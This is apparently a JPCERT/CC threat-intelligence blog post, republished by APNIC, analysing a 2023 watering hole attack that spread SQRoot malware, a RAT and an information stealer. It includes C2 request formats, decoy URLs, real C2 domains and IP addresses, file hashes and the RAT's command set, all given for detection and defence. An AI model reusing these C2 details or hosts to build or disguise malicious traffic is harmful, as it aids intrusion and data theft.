Recent cases of watering hole attacks: Part 2

By on 31 Jan 2025

Category: Tech matters

Tags: , , ,

Blog home

Kota Kino co-authored this post. It was translated by Takumi Nakano.

As discussed in part 1 of this series, vulnerabilities in exposed assets like VPNs and firewalls are frequently exploited by Advanced Persistent Threat (APT) groups, ransomware operators, and cybercriminals, with many incidents reported to JPCERT/CC. However, as these attacks increase, other vectors, such as email, websites, and social media, risk being overlooked.

Continuing from the previous article, this post explores another case of a watering hole attack, this time exploiting a media-related website in 2023.

The flow of the attack

Figure 1 illustrates the flow of the watering hole attack. When a user accesses the compromised website, an LZH file is downloaded. Executing the LNK file within the LZH file results in malware infecting the user’s PC.

Figure 1 — Flow of the attack.
Figure 1 — Flow of the attack.

The infected website had JavaScript embedded in it, as shown in Figure 3, and the malware is downloaded to users who log in to the website with a specific account (basic authentication).

Figure 2 — Malicious code embedded in the tampered website (1).
Figure 2 — Malicious code embedded in the tampered website (1).

The webpage that starts the malware download displays a message, as shown in Figure 3, indicating that the site is undergoing maintenance, and the LZH file is downloaded automatically. Additionally, if the user cannot extract the LZH file, the webpage includes a link to download the legitimate decompression software, Lhaplus.

Figure 3 — Malicious code embedded in the tampered website (2).
Figure 3 — Malicious code embedded in the tampered website (2).

Malware used in the attack

The malware downloaded by this attack is contained in an LNK file, as shown in Figure 4.

Figure 4 — Flow of malware infection.
Figure 4 — Flow of malware infection.

As shown in Figure 5, the LNK file contains a ZIP file with the actual malware and a VBS file for extracting it. Both files are Base64-encoded and are extracted when the LNK file is executed.

Figure 5 — Malicious code contained in the LNK file.
Figure 5 — Malicious code contained in the LNK file.

The ZIP file contains the legitimate file iusb3mon.exe and two DLLs. iusb3mon.dll is loaded into the legitimate file iusb3mon.exe. However, as shown in Figure 6, a session called newimp is added, and the actual malware, dmiapi32.dll (malware name: SQRoot), is loaded in that session.

Figure 6 — The newimp section added to iusb3mon.dll.
Figure 6 — The newimp section added to iusb3mon.dll.

SQRoot (dmiapi32.dll)

SQRoot is malware that downloads plugins from the C2 server to extend its functionality. The plugins it downloads are listed in Table 1.

8015ba282c.tmpDownload and execute RAT disguised as an image file
abb8fcc3b5.tmpDownload and execute shell code
8714c42184.tmpUnknown
6eadde753d.tmpUnknown
Table 1 — Plugins and their function.

SQRoot sends client information when communicating with the C2 server, while the data sent is encrypted using ChaCha20. A unique ID is also appended to the User-Agent header, and a random string (aq[BASE64-encoded 12-byte nonce]) is included in the x-auth header.

POST /papers/en-jp/task HTTP/1.1
Connection: Keep-Alive
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/9a.3f.6b.7f.18.ee.0f
x-auth: aq8bvp67Om2zyHDD6Z
Content-Length: [Size]
Host: [Server name]

SQRoot limits communication time with the C2 server from 9:00 to 18:00 (UTC +9), Monday to Friday. Furthermore, it regularly sends fake communication to disguise real communication with the C2 server as normal web access.

https://dict.digibulk.live/index
https://dict.digibulk.live/favicon.ico
https://dict.digibulk.live/jss/font-awesome.min.css
https://dict.digibulk.live/css/jquery-ui.min.css

SQRoot RAT

When the plugin 8015ba282c.tmp is downloaded, malware disguised as a BPM file (SQRoot RAT) is downloaded as shown in Figure 7. This malware is also set to communicate with the C2 server only between 9:00 and 18:00 (UTC +9), Monday to Friday.

Figure 7 — A part of the SQRoot RAT disguised as a BPM file.
Figure 7 — A part of the SQRoot RAT disguised as a BPM file.

SQRoot RAT encrypts data with RC4 and sends it to the C2 server. For the list of commands that the malware can execute, please see Appendix C.

POST /weekly/img/new/paper.php?hid=[fixed value]&uid=[unique ID]&cid=[command] HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54
Content-Length: [size]
Host: [server name]

[RC4 data]

SQRoot Stealer

Another malware, SQRoot Stealer, has been discovered on hosts infected with SQRoot. This malware is designed to steal information. Figure 8 illustrates the execution flow of SQRoot Stealer.

Figure 8 — Flow of SQRoot Stealer execution.
Figure 8 — Flow of SQRoot Stealer execution.

The actual malware is nvprojects.dll, but, like SQRoot, it runs after being loaded into the legitimate file nvSmart.exe and operates by loading plugins, similarly to SQRoot. The following are examples of plugins:

  • jtpa_record_4_0.tmp: keylogger
  • jtpa_snap_2_0_1.tmp: screen capture
  • jtpa_un_cat.tm: send file

Attribution

The attack group responsible for the watering hole attack discussed in this article remains unidentified. However, we have confirmed that the malware file names used in this attack (nvSmart.exe, nvsmartmax.dll, iusb3mon.exe, iusb3mon.dll) have been previously associated with APT10. Additionally, a web shell known as Weevely was installed on the website used in the attack.

In closing

In this and the previous blog post, we’ve dissected cases of watering hole attacks where the attackers aimed to infect their targets with malware through social engineering rather than by exploiting vulnerabilities. While current security measures often focus on addressing vulnerabilities in publicly accessible assets, it is equally important to remain vigilant against social engineering attacks like these.

Shusei Tomonaga is the Director of Incident Response Group Manager at JPCERT/CC. Since 2012, he has been engaged in malware analysis and forensics investigation and is especially interested in analysing incidents of targeted attacks.

Adapted from the original at JPCERT/CC blog.

Appendix A: C2 servers

dict.digibulk.live
mnc.poiuuioq.space
gogo.qiohanwy.store
158.247.192.54

Appendix B:Malware hash values

SQRoot
154cbce8afc48bc6d0f59726250fe7b9981ecdd0ce44fad48a3a662e3eb64135

SQRoot Plugin(8015ba282c.tmp)
f4cd4b51df47ba50c870657ff094c3355a6567f3cc77abcc4894cdaf57b2f0bd

SQRoot RAT
bb0c9d80220a93c2f9fe442f3a2ef2b41db44d9367483c8f22a25732478af82a

SQRoot Stealer
a30943c524cbf5989ca74d3d78709d40a82da2bc760afe938fa76cd21c443484

jtpa_snap_2_0_1.tmp
6988afa7950e0cecdc24e472f7e31ce855a29458c3b908554bf473686a97069b

jtpa_snap_2_0_1.tmp
0be4b77b667af42771189d697644b1760ce7c3d341a0d8d06fed0a81c4a1e253

jtpa_un_cat.tmp
41de808ce98285d750766d2a5b96cb8ddd972e282501dede2d5032de380f2146

Appendix C: Commands

1128Create named pipe
1129Download
112AUpload
112BSet sleep time
112CTerminate
112DSend drive information
112ESend file list
112FDelete file
1130Change file name
1131Copy file
1132Create a folder
1133Run process
1134Run process + send the result
Table 2 — List of commands.

Rate this article

The views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC. Please note a Code of Conduct applies to this blog.

Leave a Reply

Your email address will not be published. Required fields are marked *

Top